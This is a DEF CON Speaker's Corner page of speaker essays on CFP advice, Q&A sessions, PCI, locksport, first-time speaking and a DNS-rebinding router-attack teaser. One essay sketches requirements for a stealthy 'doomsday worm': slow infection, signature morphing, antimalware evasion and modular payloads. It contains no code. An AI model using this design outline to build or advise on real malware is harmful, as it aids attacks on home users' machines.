skip to main content

DEF CON Hacking Conference

Speaker's Corner

If you are a past or present DEF CON Speaker and would like to contribute to this page, contact Nikita [at] defcon døt org for more info!

'Twas the Week Before DEF CON

"TO GOOGLE! He proclaimed and searched for his problem, as he cranked up the volume on the new Knife Party album."

Twas the week before DEF CON and all through the house...all the speakers were drinking and finishing their talks. Zack's slides were hardly started and his laundry was dirty, when suddenly a friend cheered "It's beer o'clock thirty".

Out to the bars he sprung into action, looking for drinks and social interaction. With his number of slides only up to five, he decided to cheer "FUCK IT, I'LL DO IT LIVE"

His tool hardly finished as he went to bed, nightmares of attendees booing danced in his head. With Kaminsky in a toga and Keith in his hawk, they force fed him shots while he tried to give his talk.

The dream continued on with his demos breaking, nothing working and everything flaking. He tries to explain what it should have done, realizing that his pants were mysteriously gone.

When next to his bed arose such a clatter, waking up from the nightmare to see what was the matter. His downloads had finished and started playing, new music for DEF CON for much needed raging.

Amid his dreams an idea arose, the solution to why his connections would constantly close. His packet was off by just one bit, he should have resisted the urge to hack it.

Back to coding he sprung into action, typing away furiously with much more passion. TO GOOGLE! He proclaimed and searched for his problem, as he cranked up the volume on the new Knife Party album.

Into the wee hours on his keyboard he typed, trying to fix the bugs with all his might. As the coding progressed, he began to feel like a newbie, continually asking him self "WHY'D I CHOOSE RUBY?!?!".

He makes his final changes and runs the code, hoping for the solution to finally hold. YES! he shouts as the fixes work, commits it to git and goes berserk.

Onto the slides he must now begin, with tens of thousands flying in. From worlds near, far and in-between, some friends he knows and others he's never seen.

He'll see you at DEFCON in just under a week, where we'll start the party with our fellow freak. And through the Vegas days and into the nights, we'll learn something new this year….we just might.

(@zfasel)

Don't forget about the
Q&A sessions

"...don't forget about the fantastic opportunities to be had in the Q&A sessions."A recent conversation about some of the benefit of DEF CON as a speaker and a con-goer made me wonder how many people are aware of the awesome potential value to be had from attending the speaker Q&A sessions.

After each DEF CON talk, the speakers are obliged to attend their allocated Q&A sessions, which are incredibly valuable for both speakers and con-goers alike and are one of the things that makes DEF CON a little different from the rest. At many cons, the speakers disappear into the crowd or disappear to catch a flight out of town, but at DEF CON they're generally available to a much smaller audience for about an hour afterwards.

For the con-goer, generally you're going to get great access to the speakers in a smallish, quiet room with seating to avoid the scrum that surrounds some speakers after a talk at many of the other cons. As a con-goer and a previous speaker I've noticed that although well attended, generally the Q&A sessions aren't over-crowded (with the exception of a small number of talks from the RockStars of the world). This translates to a near unique opportunity to fill in any blanks from the talks or perhaps just get a book signed before the speakers merge into the crowd and you have that whole "I don't really want to interrupt (insert name of speaker) because she/he is talking to other people right now" dilemma.

There's also a superb chance for future collaboration. Last year, a PhD student from the Florida Atlantic University attended the Q&A session after our "Weaponizing CyberPsychology" talk and asked some great questions about data mining. We'd stuck to statistical analysis in our research, and had purposely stayed aware from data mining and machine learning due to a lack of knowledge in that area. His attendance at our Q&A session and the follow up email exchanges have led to some interesting work which I'm excited to see the progression of (he has a great looking draft paper). We've also collaborated this year to bring his data mining expertise to a new data set and the problematic issue of mining highly skewed data sets. At many other cons you might need a serendipitous encounter to strike up this sort of relationship, but at DEF CON the Q&A sessions offer an almost unique opportunity to meet in person, exchange ideas and collaborate or not.

So when you attend DEF CON, don't forget about the fantastic opportunities to be had in the Q&A sessions. You might enhance your knowledge, the speakers knowledge or strike up a cool collaboration and maybe even a future DEF CON talk (as Nikita mentioned in her CFP post).

How Do I Make My CFP Stand Out?

"...before you get busy bringing sexy back and telling everyone about it, here's a few tips..." I get asked that question a lot. Sometimes it varies in how it's put, but in principle it's the same question. "What is a good CFP?", "How do I get picked?", "What tricks or tips do you have?". Well, since the CFP just opened and we have some time, I will let you in on the secrets I have. Follow these tips and, so long as your submission is not on the following, you should make your way past round one.

It's advised not to submit a CFP on:

  1. A vendor talk.
  2. Talks unrelated to "hacking".
  3. How I used Neurolinguistic Programming to bring back a cancelled Joss Whedon series.

Actually, I'd probably be a big fan of option 3. It's something I have not seen yet, and before you ask, no, a movie to tie up loose ends doesn't count. So, before you get busy bringing sexy back and telling everyone about it, here's a few tips from a glorified teacher's aide.

Don't waste time. Answer all the questions. Fill in all the blanks. Follow directions.

I now have a twitchy triggered response to incomplete CFPs, thanks to endless half-answered applications which leave us wondering about the motives of the submitter. Be sure to clearly fill in how much time you are submitting for, the name of the talk, and if you actually read the terms of agreement, sign them. If we don't know what you want, we can't decide if we want to give it to you. Think of it like this: while we are waiting for you to respond, we are reading a paper from the other guy. The more information you give us, the better. Sending a submission back for more info is a time wasting process for all parties. You want us to get back to you quickly right? Not *that* quick, I'm guessing.

Details, Details, Details.

Please fill out a detailed outline. Detailed outline > monosyllabic bullet-pointing technique. You want to write an outline as if you are walking through your talk. It should give us a clear idea of what you are going to discuss. A detailed outline should have a beginning, middle, end, and a clear dénouement, or find yourself voted off the island.

Bad Outline:

Meh
Meh Meh
Meh Meh Grunt Meh.
I'm done here.


Good Outline:

  1. Intro
    1. Who am I?
    2. Why this talk is relevant to your interests.

  2. Background on Subject.
    1. Who is Joss Whedon?
    2. Early works in TV, Biographical.

  3. Establishing Precedent.
    1. The first show cancelled to invoke fan boi rage.
    2. The many more to be cancelled.
      1. Cancelled before they are even written.

  4. Things that cancel TV Series.
    1. It's obviously interesting.
      1. Define interesting.
    2. Cast includes attractive and intimidating female characters.
      1. Vampires, Cannibals, Demons.
      2. Uncomfortable employee/employer relationships.
    3. Target audience examples.
      1. Virginal
      2. Enjoys one or more table-top RPG.
      3. Loves nicknaming themselves and substituting fictional words for cursing.
      4. Will buy a single season series on blu-ray.
      5. Even when they already own it on DVD.
      6. Because there is 5 minutes of extra footage.
    4. A "River" runs through it.
      1. Why do Summer Glau's series mysteriously end?
      2. Is she cursed, will she always jinx it?
      3. Other common themes in cancelled Whedon series.

  5. Making the madness stop.
    1. Follow up movies and fan-made fiction.
    2. Completing the series via graphic novel.
      1. Why this is not good enough.
      2. How to know if you might have a problem with commitment.

  6. Gorram Mind Control.
    1. What is NLP
    2. Not using it to pick up chicks.

Cont...you get the point.

Where's the Beef?

Narrow it down, slow your roll. Make sure your topic, presentation title, and abstract are specific. Don't be vague with your subject matter or try to conceal the "meat" of your talk. That will bring us right back to rule number one. Take the following example into consideration: SQL < SQL Injection < Lateral SQL Injection in Oracle, OMGBBQFTW!

Nothing is worse than too vague an application, ripe with cryptic text about an undisclosed vulnerability that you don't want to tell us about and you probably shouldn't anyway because it will destroy the world or at least overflow a few oil tankers at sea, but you will tell us once we accept your talk.

In all the years I've worked for DEF CON, I can promise you that neither I, nor anyone else in employ has passed on or leaked information from a submission. We do consider your submission an honor and we wouldn't break the trust you placed in us, or our reputation to keep our lips shut. Now, if you DO have some super leet destructo 'sploit we would encourage responsible disclosure and we might not accept you if you didn't give all parties a fighting chance to patch up before word gets out. We're not looking to line the walls with cease and desist orders and expensive legal costs. Personally, I hate having to re-arrange the speaking schedule at the last minute due to cancelled talks.

You don't always have to provide working code, or a live demo, if we need it then we will we ask. Proof of concept is nice, a white paper or rough draft of slides go a long way in letting us see that you are serious and have put in the work. Additional materials shows you put in the time. Please also remember to put adequate time in making those additional materials legible and print friendly. White text on black background and "Matrix" slide after slide is detracting. Scantily clad or nude women in your slide deck do not add to the value of your talk either. Support your work with content, not flashy distraction. We don't go around accepting talks willy nilly because we like your jokes and jpegs.

We want new, interesting, documented, researched, and preferably never before presented submissions that are concise and clear. Even if you have presented this talk before, how are you going to make it better for us? Yes, I said it, BETTER for us. We want our content to be better than everyone else's. That's not egotistical, it's high standards.

We like talks where you took an idea and ran with it, however we don't like it when you run off with someone else's work. We like talks that reference the work of others or prior art. Give credit to your inspiration, if you got an idea from sitting in a DC 19 talk say so and let us know how you added to it? How did you contribute further how can the audience add to it? Where did you get your information? Saw a UAV at a hackerspace last weekend and you built a bigger better version that's cool? Lets see some photos of version 1.0?

Sifted through endless research papers to backup your claims? Cite them. The attendees want to know where they can go after your talk to learn more, sometimes that might be you and sometimes you might recommend reading a book or two to get started. We want to see submissions that expand the learning experience beyond 50 minutes at DEF CON.

What if your work is "incomplete"? Let's say you know you have enough content for a turbo talk, but your team is not done with the project and you might want to bump it to an hour later. Include what you do have now and leave a footnote explaining your intentions. You can always update your CFP, and you can always ADD to your talk, so long as it doesn't drastically alter the subject matter or decrease the value. If you are communicative with us we can make anything work.

DON'T say you have a tool or an exploit when you don't.

Don't pimp your employer and don't try to sell something. There are a lot of other conferences that accept proprietary software talks where men in suits talk for an hour straight about how their tool is the best tool for pen testers and all other options are unworthy. Worse still is a hidden sales talk in disguise. Five minutes out of 50 explaining how to do something outside of your product is not a healthy relationship.

I am the last person to criticize spelling and grammatical errors, so if I am gawking at the obvious errors, you have problems. A courtesy spell check is all I ask for. Word to the wise, we prefer submissions in English, not alpha numeric, it's not as cute as you think.

Be flexible.

If you want to speak at DEF CON, prepare to speak on Sunday. Even if it's the last talk of the day on Sunday, take the slot and don't worry that "people won't see it". They will see your talk, there were upwards of 12k attendees last year, and no room had crickets chirping. Besides, they are recorded, so if they miss your talk at con, they will see it later. It will be on record for many years to come. The same goes for Friday, not everyone can speak on Friday, regardless of how much you want to party or "get home early".

If we ask you to cut or extend your talk, consider it. We might be trying to fit you in the schedule with less time because it's already full. Or we think your talk would fit well in sequence with another talk, if only it was a little longer.

If we want to see a demo, or request more info, consider sending us your best promptly. We might have another submission that is similar to yours and we can't decide which is "better".

"What makes a good speaker once I AM Accepted?"

Read your emails throughly. Especially if they come from me.

Meet your deadlines.

Submit presentation materials.

Cite your references, watch the umms and ahhs, and avoid running over or under time.

Focus on making your content the best it can be and your talk, "the" talk, to be in.

You can make it fun too, include waffles if you want to, but your content should stand its ground regardless of theatrics

Write a speakers corner to address the public with a sneak preview of your talk.

Don't pass up opportunities.

Don't specifically ask not to speak at the same time as another speaker. Three other people will have to speak opposite of Dan Kaminsky or Adam Savage. How do you know that other speaker wouldn't rather be listening to your talk and is bummed they missed it?

Lastly, Make sure you are available to the public for questions and discussion, don't isolate yourself from attendees. Go to the Q&A Room after your talk, hang out and talk to people. The guy you might hang out with all night at con might have submitted a similar talk, maybe next year you team up and become like wonder twins or something.

Consider the following linkage to feed your brain.

Speaking and Research Tips:

http://www.aresearchguide.com/3tips.html http://www.speaking-tips.com/
http://cameronmoll.com/archives/2009/02/20_tips_better_conference_speaking/
http://www.archive.org/details/2009-04-jscott-presentationpresentation
Strom Carlson: http://www.youtube.com/watch?v=_wb2b69JNU8
http://www.aresearchguide.com/1steps.html
On Submitting: http://defcon.org/html/links/dc-speakerscorner.html#daniel-cfp
On Advice: https://www.defcon.org/html/links/dc-speakerscorner.html#wiseman-street
On Attitude: https://www.defcon.org/html/links/dc-speakerscorner.html#idols-moyer
Just read them all: https://www.defcon.org/html/links/dc-speakerscorner.html
Past Show Archive: https://www.defcon.org/html/links/dc-archives.html

A PRIMA ON AN INTERNET DOOMSDAY WORM

"Can a doomsday worm shut down the Internet?" This is a theoretical prima to bring out a discussion about whether an Internet doomsday worm can be created, that is so intractable that it cannot be eradicated. This worm could also have the ability to carry multiple weaponized payloads. Can a doomsday worm shut down the Internet? I don't think anyone could shut down the Internet, but I believe a worm can definitely create access problems. To look at some of the requirements for this worm, I think the best model to look at is a biological one.

The AIDS virus has confounded medical science for number of years. It seems to be one of the most successful viruses in modern history. From the article "Why Diseases Such As AIDS Are So Successful and So Deadly:" "Cell-to-cell transmission is a thousand times more efficient, which is why diseases such as AIDS are so successful and so deadly," writes Mothes. "And because the retroviruses are already in cells, they are out of reach of the immune system."

Cell-to-cell transmission is a thousand times more efficient. I think the best analog to this is social networking sites that have the greatest transmission throughput.

On the second line, "They are out of the reach of the immune system," if you take a corporation with 1,000 nodes that are infected, it's easy for data security to push down a solution and remove the worm. The PCs that are actually outside the immune system are almost always home PCs, iPods, Android phones, and small network PC groups.

What else can we learn about a biological model? If you walked into the middle of crowded room and asked if anyone knew Mary Mallon or Gaetan Dugas, you probably have a lot blank stares. Gaetan Dugas was AIDS patient zero, and Mary Malone was the infamous Typhoid Mary. They share some similarities that helped them to infect a lot of people. They appeared healthy and did not have any outward signs of any health issue at all. The gestation period for AIDS was more than 10 years, and Dugas infected a lot of men. Mary Mallon was a cook. She handled food and utensils, and at one time, she worked in a hospital. Mary she was a carrier of typhoid but it did get sick. Some of these ideas could build a good model for a worm.

With the above and what I know malware, let's build a model:

  • 1) It would have to operate in the noise level of the Internet.
  • 2) It would have to behave as a WebCrawler or spider to stay off of the radar of malware companies.
  • 3) It would have to infect its hosts with minimal discomfort; that is, minimally slow them down or it make it appear as if it was not a type of malware that somebody would want take the effort to remove.
  • 4) It would have to infect very slowly.
  • 5) It would have to be self-aware—it would have to recognize itself trying to re-infect a host.
  • 6) A model would have to be built for it to judge how its growth rate would have to be modulated.
  • 7) AIDS had a gestation of up to 10 years. A gestation time on the Internet of only one year would be an incredibly long time.
  • 8) The worm would have to be modular enough to take different payloads.
  • 9) It would have to try to just infect home PCs. Home PCs have been deluge with strange malware and bogus antivirus pop-up ads. Recently, Microsoft tried to issue a malware solution. This antimalware flagged Goggle Chrome as a Trojan, and actually remove Goggle Chrome from a number of PCs.
  • 10) It may also contain code to write to places on hard drives that are normally inaccessible to antimalware programs.
  • 11) Have to self morph, it would have to evolve
  • 12) Be able to present different signatures to antimalware

I got the idea for a doomsday worm from a Chinese hacker website. I don't speak Chinese, so I had to use Google Translate, and as they say sometimes things get lost in the translation.

Submitting to the DEF CON CFP

"You do stuff, you know stuff, and you have the stuff, now it is time to share it." It is that time again; the DEFCON Call for Papers is open. Get busy, submit your stuff. You do stuff, you know stuff, and you have the stuff, now it is time to share it.

But first: pause and actually READ the CFP announcement (at http://www.defcon.org/html/defcon-19/dc-19-cfp.html). Read all of it. Now, think about what you have that you want to share and ask yourself which of the session lengths and formats is best for your content. Got it? Great, it's time to start assembling your proposal. Look at the CFP form (http://www.defcon.org/html/defcon-19/dc-19-cfp-form.html). Look at it, but do not start filling it out right away. There is specific information requested, in specific formats – it would be a great idea to provide that information, all of it, as requested. Assemble a coherent proposal, double-check it, head back to the CFP form, submit, and good luck!

A few more tips:

1) Follow the directions. Yeah, I know I just said that, I'm saying it again. This is one of the best ways to "hack" a CFP and get accepted (or at least not be first rejected), follow the directions.

2) This is not an English major's thesis, but you still need to proofread your proposal. Check your spelling and grammar, and make sure your proposal makes sense. Speaking at DEFCON means that you are communicating with hundreds or thousands of people in your session. If you cannot effectively communicate your ideas to a few folks on the speaker selection team you may not be the best candidate for speaking at DEFCON.

3) Be concise. That does not mean your submission has to be simple, or short, but it needs to get to the point, and have points to make.

Think about it this way, if you were staring at a DEFCON-sized pile of proposals would you like to read train-wreck paper after incomplete paper for hours on end – in your spare time, as a volunteer? I didn't think so. Do you think that a few hours into the pile the complete and correct CFP proposals would start to float to the top? Yeah, thought so. Make it easy on the staff, and improve your chances at getting accepted.

See you in August.

Stop. Think. Connect. A Special DHS, PSA Contest.

"I can only imagine the hilarity that would ensue in a minute for a video entitled 'How to not be a Noob' or 'Phishing & Trolling, not what it was in Grandpa's day.'" Howard Schmidt, Special Assistant to the President and Cyber Security Coordinator has issued a special PSA Contest. This crowd sourcing campaign is in an effort to alert the general public to Stop, Think, then connect, when it comes to their online presence and responsibility. Good, bad, or otherwise, I would really like to see what the DEF CON community came up with.

I am confident that our DEF CON community could come up with some pretty interesting feedback in regards to this contest, I'd love to see and hear the creative ways you would advertise to the general public. I can only imagine the hilarity that would ensue in a minute for a video entitled "How to not be a Noob" or "Phishing & Trolling, not what it was in Grandpa's day." Overall, I have had a love for PSA's since I was a kid. A lot of us remember and have a special place in our hearts for the PSA's of our youth, especially ones of the "The More you Know" variety. Who didn't like watching "This is your Brain on Drugs" or GI JOE telling us that bullying is wrong? I know I did, and "Knowing is Half the Battle".

From the contest:

"Keeping the Internet safe is a responsibility we all share. We need to take time to stop and think before we connect to the Internet, share information online, or participate in online communities. But sometimes, a creative and compelling reminder can help. That's why the Department has kicked-off the Stop. Think. Connect. PSA Challenge – because all Americans have an important role to play in securing the Internet. We are looking for videos that will help educate Americans about Internet safety and what we can all do to protect ourselves and our families online. If you know what it takes to get Americans motivated to improve their safety online, then we need your help. We want videos that inspire Americans to Stop. Think. Connect."

For details on the requirements and how to submit visit the contest page at: http://www.dhs.gov/files/events/stop-think-connect-psa-challenge.shtm

PSAs must include at least one of the following Internet safety tips:
* Keep a Clean Machine
* Protect Your Personal Information
* Connect with Care
* Be Web Wise
* Be A Good Online Citizen

In similar fashion, I'd love to see if anyone out there posts something on:
* Understanding Encryption
* Surfing Anonymously
* Using Proxy Servers or Feed Over Email
* Understanding Copyright, TOS agreements, and Privacy expectations.
* Who and What is a Troll and how to defeat them.

This past year we had a few talks both in the offense and defense perspectives, check them out on the DC 18 archive, there are too many that fit this topic to list, you might find something that inspires you. I hope you guys & gals out there send in a submission, if you don't want to submit to the official contest, can you send us a link instead? These PSAs would be great to show at DEF CON 19, and if we can, we'd probably like to share some of your clips online so we can get the word out to "Stop. Think. Connect" The contest runs until Feb 14th, Valentines day, so send in your love, send us links, let's get this PSA party started.

Good luck!
Nikita

@niki7a on twitter.
Nikita@Defcon.org

Feel free to comment or introduce your own insights for this discussion on the thread for this article on the DEF CON Forums!

How Did We End Up Like This?

"...compliance issues are driving and defining both security and budget in businesses large and small, and that means a lot of hackers' day jobs are touched by PCI." Earlier this year I participated in a panel discussion on PCI at DEF CON. Yes, PCI at DEF CON. It was actually a very lively and informative discussion, and the follow up in the Q&A room was informative and *very* lively. While I am honored by the opportunity to speak at DEF CON, and to share the stage with several people who (unlike me) actually know what they are talking about, I do have one question that keeps tormenting me:

How the hell did we get to the point that PCI is a topic that draws a crowd at DEF CON?

I don't think there is any one answer, instead there are several. Here are a few:

First, I think part of the draw of candid conversations about PCI is that compliance issues are driving and defining both security and budget in businesses large and small, and that means a lot of hackers' day jobs are touched by PCI. It doesn't matter whether you are a network admin, outside pentester, manager; anyone who is involved with regulated systems or data feels the impact to varying degrees. Even people who have nothing to do with information security may feel the budgetary impact of compliance. I think those indirectly involved with compliance are starting to see this, and take an interest – and there have been almost no conversations designed to engage or inform the technical InfoSec practitioner audience.

Another factor is that while we rarely "grow up", people in the hacker community frequently grow older (often at an alarming rate). This occasionally means ending up in jobs with words like "manager", "director", or even "chief [something something]" in their titles. These poor folks can't get away from compliance. They may still go to DEF CON, but they've probably been to a lot of "Business of InfoSec" conferences lately, too. And candid conversations aren't always what you get at those kinds of vendor-driven events – so a hacker con take on the issues may appeal to them.

There is also the issue of management-speak, which is a foreign language to some DEF CON attendees. While this may eventually be career limiting, it shouldn't limit anyone's access to information. We have tried to keep our discussions "non-denominational", and minimize or at least explain the acronyms and jargon used. A related thought – it is possible that our inability to effectively communicate security issues to senior management leaves them vulnerable to believing that complying with a security regulation means they are secure – but that is another talk for another year.

Note: it is important to remember that it isn't just PCI, there are a myriad of other regulatory requirements in the wild, but PCI seems to be the poster-child for regulatory issues.

And finally, there is DEF CON itself. While many people (mostly those who have never attended) have a pretty narrow view of DEF CON and those of us who attend. We know better, it is a dynamic event with a dynamic audience, and the mix of content highlights that. Thanks again to the DEF CON team for giving us the opportunity to bring this topic to a wider audience.

Feel free to comment or introduce your own insights for this discussion on the thread for this article on the DEF CON Forums!

Experiences of a First Time DEF CON Speaker (Part II)

"In short, I like to laugh and learn and that's how I like to communicate..." Previously I wrote about my experiences as a first time DEF CON speaker prior to speaking.  Now it's only fitting that I complete the story and write about my experiences shortly before, during and after speaking, hopefully encouraging future would-be, speakers.


A Few Weeks Before the Con

In the weeks leading up to the con, I found myself pretty focused on presentation content, how could I best get my message across and how did I want to deliver it? I spent time looking at previous talks to see what worked well, especially in terms of what level (skill-wise) to pitch the content at.


Choosing a Presentation Style

I generally prefer talks where it's fun and/or that its clear the speaker is passionate about his subject. In short I like to laugh and learn and that's how I like to communicate (when possible of course and it's not always possible in a corporate environment).  Obviously, you need to choose a style you're comfortable with and that fits your content; it's unlikely the less serious approach will work for deep technical talks.


Creating Content (Slides)

A number of friends and co-workers all offered to be guinea pigs and sit through a rehearsal, timing the talk and such like.  Well, I'm not really that kind of person. For example, for my wedding speech, I wrote some bullet points down about 3 hours before the ceremony, and the speech seemed to go down well. I typically adopt the same approach (out of work) for other talks and mostly it works out. So I was opting for a similar approach here.

I decided to use slides predominantly as visual support rather than things to be read, i.e. a lot of pictures.  Now, I'm no Johnny Long, but that style of presenting and receiving information appeals to me the most.

I outlined roughly 120 slides and had a reasonable idea what I wanted to say for each slide.  120 slides, for 50ish minutes?  In your face "effective presentation skills".


Timing

OK, so I did sort of test the timing out for this talk as I tend to run over if I'm not careful.  I opted to time by sections rather than slide by slide, by reading through the slides over a beer in the hotel. For example, section one took 15 minutes, section two 20 minutes and section three, 25 minutes, making 60 minutes in total.  Fine for Blackhat with 15 minutes to spare, but I'd have to knock ~15 minutes of for DEF CON.  I figured I'd talk faster at DEF CON..simple really.

The benefit of timing by section is that you can easily keep track on whether you need to speed up, or whether you want to slow it down a bit.  Timing by slide can get a bit too distracting. FWIW, the KeyNote presenter display really helps here.


Understanding the audience

This is something I agonized over for hours, always considering whether the audience would get bored stupid by a slide, or worse still a sequence of slides.  To reduce boredom and to ensure that people didn't feel short changed, I took a leaf out of Michael Shrenks DEF CON 17 talk and made the agenda and goals clear. i.e. this is what I'm talking about, and this is what my aim is, "i.e. leave interested enough to try stuff out or read more".

I also added a quad chart to highlight that n00bs stood the best chance of gaining a lot from my talk, while experts were free to stay and heckle.


White-paper

The white-paper, was to prove useful. I used it as a place to go to town on "the science" and reference any research I'd stumbled across on the topic. This way, the talk could entertain and if people were sufficiently interested, they'd seek out references and step by step instructions in the white-paper.  This really gave me some freedom with the talk.

Note: I still have to follow up with a couple of people looking for code. I haven't forgotten.


Nerves. Night before

I anticipated some nerves for sure, but I was also hit by something a number of other con speakers get... it's the "oh shit, the other talks are much 1337er than mine and I don't deserve to be here" syndrome.

The fact is, you're there, DEF CON critically reviewed your Call For Paper entry and you do deserve to be there. Still, it's harsh slap in the face when it dawns on you what others are talking about. When people are "JackPoting" ATMs and "dropping 0 day", you naturally get a little freaked out.

The best advice I can give here is to just get on with it, because ultimately, if your talk bombs, it's not the end of the world. Secondly, it's a fantastic opportunity to be able to speak at these cons; savor each moment as it may be your last.


Nerves. 60minute countdown

Everyone has different ways of dealing with it and some lucky buggers don't get nervous at all.  I tend to avoid people where possible.


On Stage Tech FAIL:

The proctors/goons are awesome and really help to put you at ease.  I also grabbed a friend/goon (alien) to help me get rigged up. Usually I can get my Mac working on the big screen no problem, but put me in front of a audience of ninja's, watching my every mouse click and that's it, I turn into "Never used a computer before man".. so thanks alien for helping sort the display FAIL out ;-)


On Stage:

So you're there, what are you most comfortable with, holding the mic or speaking into a mic on a stand?  Heck, I play rock-band, I wanna hold the mic and walk about a bit, or at least feel like that's what I'm doing.

The first couple minutes are the worst.  Deep breath, slow it down and go with your opening gambit, I typically like to break the ice, so I introduce Helga.

After the first couple of minutes, I felt that I was pretty much in my stride and began to really enjoy the experience and it is a great experience.


Post talk

Ignoring the overwhelming sense of relief, I was really excited by the level of interest and follow on discussion (in the breakout room, via email, in person etc).

I got speaking to a number of people, including visualization experts such as Raffael Marty (http://www.secviz.org/), I'm just a hobbyist that guy's a real viz-pro. I got talking to social network ninjas, investigative journo's and other con speakers (new and old).  Speaking brought me in contact with others sharing my interest in the topic. For me, this is probably the primary benefit for speaking.  Made some great friends too,


Follow on

A couple of people really seemed to like the talk and wrote it up here and here. That was a really welcome surprise.

Most recently, the talk led to an article in a U.K. national newspaper (The Daily Mail) and an appearance on the Breakfast TV show Daybreak.  It's funny seeing yourself described as "an expert", especially when you really don't think you are; I mean, lets face it, this stuff isn't Kernel Hacking Science.


Conclusion

A great experience.  Talking put me in contact with a community of people engaged in visualization and investigative fields and opened doors for some truly excellent experiences and discussion.

Oh, and the signed DEFCON skateboards generated roughly $1,500 for Hackers For Charity and EFF  (here's a pic of the EFF deck with a Klingon..)


Will I do it again?

I really got involved by accident this year, just thinking that a talk on data visualization and social networks might encourage others to play, so, as for speaking again, if a talk springs to mind I'll be submitting a paper for sure. Mostly I hope that my experiences inspire other people to have a go.

Feel free to contact me via any of the methods on my website here and here's the links to slides, white-paper, audio and video.

My Secret Locksport Agenda

"That's 700 more people I'll never have to explain myself to!" There is an awkward moment for those who pick locks for fun: telling friends and family about it. Many people have an immediate negative reaction to the thought of picking locks:

"Isn't that illegal?" -- "You're a thief?" -- "I better not see you around my house!"

Sometimes it upsets friends and family so much that they stop talking to you. I was lucky; only one family member reacted this way. I was naive, happily chatting to anyone about my new hobby turned many people off. After a year of getting rebuffed and accused I learned to hide what I love most. I love locks -- I'm fascinated by them. I find the smell of brass and grease invigorating. Until I became interested in locks I thought people who were obsessively passionate about something were absurd and lying about how much they loved it. I had no idea. When it comes to locks I am wholly consumed, so keeping mum was frustrating. There were places I could talk about it and people who didn't care or were into it, but when I met someone new I'd talk about anything but locks.

Then I went back to Holland.

When I first learned to pick, Barry Wels convinced me to attend the Dutch Open (now LockCon) in the Netherlands. The first year I attended I didn't know anyone and was stunned by the talent and knowledge in the room. My experience was a constant state of awe. The second year I knew more and had established myself as a strong picker at DEFCON 15. My focus was on the competition; how far I could go and who I could beat? I was taken by surprise when Arthurmeister gave me a bear hug when I walked through the door. I was distracted by these people who had become my friends. On the ride up to Sneek I traveled in the back seat of a friend's car with his children. We didn't speak the same language so we made faces and took pictures with my new camera and they taught me little games. It was really endearing.

This particular year the conference was around a local holiday where children running around with paper lanterns begging for candy. A few of the adults took the kids into town to go door to door. We would sit down to big family style meals and I was amazed at all the people who remembered me and were happy to see me. The whole thing felt like a family reunion. Then it was time for the competition. I tried to focus and be serious but I was scolded by some Germans who told me to have fun. I looked around and saw kids peaking in from the doorway, excited and cheering for their parents.

I left with a much different view of locksport and the community, one that has been reinforced every year. The overriding theme of LockCon has been, for me, normalcy. This is where everyone is excited about locks, curious about new ideas, and, more importantly, where friends and family can spend a weekend catching up and finding out about each other's lives. Sinterklaus even stopped by once!

So, I started talking locks again with friends and pretty girls I was trying to get to know. It's not the first thing I talk about, I try to play it cool, but when it comes up I can't help but show my passion for it with excited babbling and an inspection of their keys. There was a bigger change, too. I started talking to other people about it, people I'd never met and large audiences. I began doing interviews and workshops and suddenly found myself profiled in a local free weekly. After my profile in the Boston Phoenix I landed a story on All Things Considered and a bio in the Boston Globe. I started honing what I wanted to say about Locksport and what I love about it. I appeared on the History Channel and doubled the number of speaking engagements I do each year. I've started doing workshops for new audiences. My mother even got involved and connected me with a mystery book author's conference where I'll be on a panel of experts discussing attacks and forensics for the literary mind.

All of this has stemmed from the same idea: normalcy. I love DEFCON and the hacker conferences, but I want to speak to a wider audience so the next time I'm being introduced as a competitive lockpicker at a dinner party I don't have to spend 10 minutes explaining that I'm not a thief, not going to break into their home and that yes, in fact, this is legal. I don't care if people pick -- I am not on a mission to convert anyone to locksport. I just want them to have heard of it. To know that it exists and be prepared when they hear a friend or loved one picks locks. My ideal is to have people be absolutely indifferent. I don't need anyone to love what I love, but I don't want them to hate that I love it.

Now I'm embarking on my newest venture, launching my own line of lockpicks. I'm proud of them and I think they will be successful in the locksport community. I have had incredible support from them both developmentally and financially, but I'm not making picks for them. I'm making them for the world. I want to spread the knowledge of locksport via marketing. I want to expand the market, catch the curious and let people know that this exists. I'm launching my picks via Kickstarter, an all-or-nothing funding platform that depends on individuals pledging small amounts of money to back your project. I set the lofty goal of $6000 and as of this writing, have raised over $50,000. I cannot tell you how exciting it is that many, if not most, of those individuals backing my project had never heard of Locksport, didn't know of it's potential for social acceptance and jumped on the boat anyway.

This will be the first set of lockpicks many of these people ever own. That's thrilling to me. When I look at the backer list I think to myself, "That's 700 more people I'll never have to explain myself to!" So, it's selfish, to be sure, I just want people not to gawk at me when they find out what I do. I think we'd all like to be taken at face value a little more often -- I'm just taking a more direct route to making that happen.

Hacking Millions of Routers

"Given the number and popularity of the affected routers, this translates into many millions of vulnerable routers deployed world wide..." After having attended the past couple of DEFCONs, I'm really excited to be speaking at DEFCON 18 this year. In anticipation of my presentation, "How to Hack Millions of Routers", I thought I'd take this opportunity to answer some questions, offer some background information, and give a quick teaser about the talk.

Most people assume that because they don't have remote administration enabled on their router, external attackers cannot access their router's administrative Web interface. However, for many routers this is simply not true; anyone with a registered domain can in fact gain full interactive access to the router's internal Web interface in order to exploit vulnerabilities or log in to the device (either via the router's default password or a brute-force attack), at which point they can view settings, change settings and generally do whatever else they want with the router*. However, this attack is not restricted to the primary Web interface; it can also be used to gain interactive access to SOAP-based services running on the router as well, such as Universal Plug-n-Play which requires no authentication at all. While this attack does not work against all routers, out of thirty different routers tested the attack was successful against more than half of them, including the venerable WRT54G from Linksys, ActionTec routers used by Verizon FiOS and DSL customers, and many others. Given the number and popularity of the affected routers, this translates into many millions of vulnerable routers deployed world wide, not to mention all the other routers that have not yet been tested.

The attack is actually a combination of many things, from browsers and JavaScript to firewalls and TCP/IP stacks, but it ultimately centers around DNS rebinding*. Although DNS rebinding has been publicly discussed for almost 15 years, many people still don't completely understand it. I've gotten several inquiries about the talk, and they generally boil down to two basic questions:

1) What is DNS rebinding?
2) What is so special about the DNS rebinding technique presented in this talk?

To understand DNS rebinding, let's examine why DNS rebinding is needed in the first place: the same domain policy. The same domain policy is a security policy that is enforced by your Web browser. That policy states that if you browse to http://www.evilhacker.com/, then that page from www.evilhacker.com can tell your Web browser to load content from other Web sites (images, JavaScript, CSS, iframes, etc), but it cannot see the responses from those Web sites nor access the content that is returned by those Web sites. In other words, JavaScript from www.evilhacker.com can only access content from www.evilhacker.com because that content comes from the same domain. This is a good thing, as you wouldn't want some JavaScript from www.evilhacker.com making unauthorized XmlHttpRequests to Web sites inside your local network or elsewhere.

